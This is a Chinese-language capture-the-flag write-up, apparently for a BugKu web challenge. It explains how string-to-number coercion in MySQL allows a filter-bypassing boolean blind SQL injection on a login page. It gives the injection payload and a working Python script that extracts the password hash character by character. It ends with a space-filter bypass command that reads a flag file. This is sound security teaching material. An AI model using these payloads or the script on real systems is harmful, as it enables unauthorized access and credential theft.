题目地址:跳转提示
打开网址,看到一个登陆页面:
首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=...
发现'#','-- ',' ','or','and','/*'都被过滤了
尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是单引号闭合
输入用户名为a'-'0,密码123
发现结果显示密码错误
可推出,确实是单引号闭合
原理:
在mysql中,当对字符串进行运算或者比较时,首字母非数值的字符串都默认转换为数值0,如:
'a'-'b'=0 'a'-0=0 'a'-1=-1 '1a'+0=1
因此,用户名为a'-'0,相当于SELECT * FROM tab_name WHERE uname='a'-'0'
因为加减运算符优先级高于比较符号,因此做判断时相当于找出表格中uname=0的字符串,而之前说过,字符串作比较时,首字母非数值类型的字符串都默认转换为0,因此就相当于找出表格中索引首字母非数值类型的用户名
于是可利用这一特点,构造payload
uname=a'-(ascii(substr((passwd)from(1)))=97)-'b&passwd=123
ascii(substr((passwd)from(1)))=97的意思是判断passwd的第一个字母的ASCII值是否是97,是的话返回1,不是的话,返回0。可知,若等式不成立,则构成'a'-0-'b'=0,登录报密码错误,若成立,则构成'a'-1-'b'=-1,则返回用户名错误。
于是由脚本:
import requests
ra=requests.session()
url='http://114.67.175.224:11846/login.php'
Headers={"User-Agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Mobile Safari/537.36"}
s=""
for j in range(1,33):
for i in range(48,127):
u="a'-(ascii(substr((passwd)from({0})))={1})-'b".format(j,i)
data={"uname":u,"passwd":"123"}
pa=ra.post(url=url,headers=Headers,data=data).text
if "username error!!" in pa:
s+=chr(i)
break
print(s)
这里要注意,访问的url是/login.php而不是/index.php
运行得到结果:4dcc88f8f1bc05e7c2ad1a60288481a2
md5解码得到密码为bugkuctf
输入账号密码,得到:
发现空格等符号依然被过滤
尝试指令cat</flag,得到结果